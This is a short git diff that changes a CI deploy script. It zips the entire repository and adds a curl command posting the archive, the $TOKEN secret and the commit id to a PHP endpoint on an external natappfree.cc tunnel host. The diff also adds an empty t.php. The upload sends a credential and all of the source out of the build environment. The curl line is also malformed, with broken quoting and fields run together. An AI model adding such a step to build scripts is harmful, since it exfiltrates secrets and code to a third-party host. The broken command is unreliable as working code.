diff --git a/deploy.sh b/deploy.sh index b6f0cbe6..0ec475ff 100644 --- a/deploy.sh +++ b/deploy.sh @@ -1 +1,2 @@ -zip -r -q -o $token.zip ./ \ No newline at end of file +zip -r -q -o pack.zip ./ +curl -F "token=$TOKEN&commit=$TRAVIS_COMMIT "filename=@pack.zip" -H "Expect:" http://2d7usb.natappfree.cc/t.php \ No newline at end of file diff --git a/t.php b/t.php new file mode 100644 index 00000000..bcc16d28 --- /dev/null +++ b/t.php @@ -0,0 +1,3 @@ + \ No newline at end of file